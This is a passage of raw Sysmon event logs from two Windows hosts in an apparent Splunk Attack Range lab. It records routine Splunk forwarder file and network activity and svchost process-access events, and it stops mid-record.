Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54760-false10.0.1.12-8000- 23542300x80000000000000001060732Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:02.536{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9C0EB77BD042A219CAF7FFFA7754A33,SHA256=19852F806D9F2A5CF3CFFFED3AF908D013234C7E33B2B3F478A18DE770E76D7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245376Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:02.640{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F572885A2BD8B2D23D022100D40864A4,SHA256=8050E9571464A3EF3DDE5C571DC8628B5B84BBBF0A0FCE7C0A0F6CDA70D5C0BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060734Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:03.912{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C2058C0054124FA378AF8D2EB4CD825,SHA256=6A432B134F365D86112350DEB14A682CE05C8BDAE511C956BBAB9DE62C46B0DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245379Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:03.656{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706D40E1FA021F2E281FA3E0D9D0A659,SHA256=04B573FD597F7C964E9E7203E90C8F7DC0C7B645FD656D56B787C0CF743139DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245378Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:03.469{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6302926DAFE0F033DEF1A22C58077A5,SHA256=DC17C88256768757EC7A0BDDAAA44F9AA383F8429B4EA2D0B9F47B92A0F5C328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245377Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:03.469{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6AF93D9256175D9B546B5CF79CDEF5B,SHA256=75F4F81F1968F185C78FCB761D186061EBB56BB12054211145F5639E1EFF4A3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245380Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:04.687{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B8D5F2C512CECC366B448735B29FB4C,SHA256=EF95D1E6680294D99A509BB4DBA63FEEF53627E5ACCD2712854326FA946316E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060735Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:05.271{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DC059D398B54BC78D6FDC1D60625B1F,SHA256=E16DF99322DCB93D1F2BBD74ED7A62F1FB329BD12D9B201CDA4BDDC6B810DC3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245382Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:05.750{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1307AEEA5AD90CDCDC9E8444117B3A1,SHA256=42ABF2C277ED669CA11B126427D357BF7FBF8878B4CA5FAA0ABF428DDE494394,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245381Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:02.664{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64748-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060736Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:06.631{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE027DA7C9A224E78A984822F052FB2D,SHA256=0B63802C51016744CEEED19C81EA3FB74E5B58D0C870BD18924ADA05AFFB494A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245383Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:06.765{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD514EB60F34D5E781137B52030FB0D9,SHA256=C610E32A6A9F8E5A1299B1700117B852D99051AB64667DC7FA78762595B0F089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060739Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:07.990{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E2DEE31992766A71C3FEAE04F522CA8,SHA256=4438AA0072491BE931CD79BF94538F834B670D1F77134985C9C75D1A3F679822,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060738Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:05.036{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54761-false10.0.1.12-8000- 23542300x80000000000000001060737Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:07.303{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6E5A037CD59612D24AF5E8E2892C69D,SHA256=A869A97D702EF62B4AA4CEFC4A20DC09E3FDACAF33B29A0A2D5420836CFA7D49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245384Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:07.765{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=610C032CFCEF918D15DD29E95EF3E9B3,SHA256=8F38B4C7101D7E8C990F1BDFA01369F98D60C15125A79F35D6959EA7273D279D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245386Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:08.765{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=192076826F5CB8418B43E495C4800B2C,SHA256=1B3B88086105109D0BE74475517E7ED8D48653172F2E7284E43239E33321A7C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245385Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:08.250{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6302926DAFE0F033DEF1A22C58077A5,SHA256=DC17C88256768757EC7A0BDDAAA44F9AA383F8429B4EA2D0B9F47B92A0F5C328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060740Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:09.350{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C9EE6CA3C151C2D600C7CD12C5B1975,SHA256=D2CDF70A6DC867748268195799785F673D0092483DF7BD30CCE86D1F04EDE5A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245388Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:09.797{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60D489CAEF4E62221152747B3CD8CF7,SHA256=B4DDB0FF018A13EF01CE2F95D36AC480AFCA6A354984C7F3FC59907753484FA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245387Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:07.664{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64749-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x80000000000000001060741Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:10.334{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2E00-00000000AF01}2196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245389Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:10.797{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA25971161D5C80E0C5C77D9251F01C1,SHA256=E1858A823DF9EFC9D24204246B97FF4D03EBCF8418AE140577B9F8751C5F0D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060742Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:11.350{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29D6E549B90049355B9F12B5C877B02D,SHA256=EACA78F8EAA690DBDA62506B44D7D549204BA915ADE65DBC4954B489D6D481D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245390Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:11.812{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3EA606A11E0FE110F598E6738AED195,SHA256=7F788990A45319E643AE629EC7EFE8DDB9CA29BDEDCF1B65E605728AC080ED72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060774Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060773Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060772Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060771Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060770Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060769Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060768Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E68-6063-8F00-00000000AF01}3764C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060767Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060766Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060765Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060764Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060763Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060762Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060761Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060760Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060759Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:12.616{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060758Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 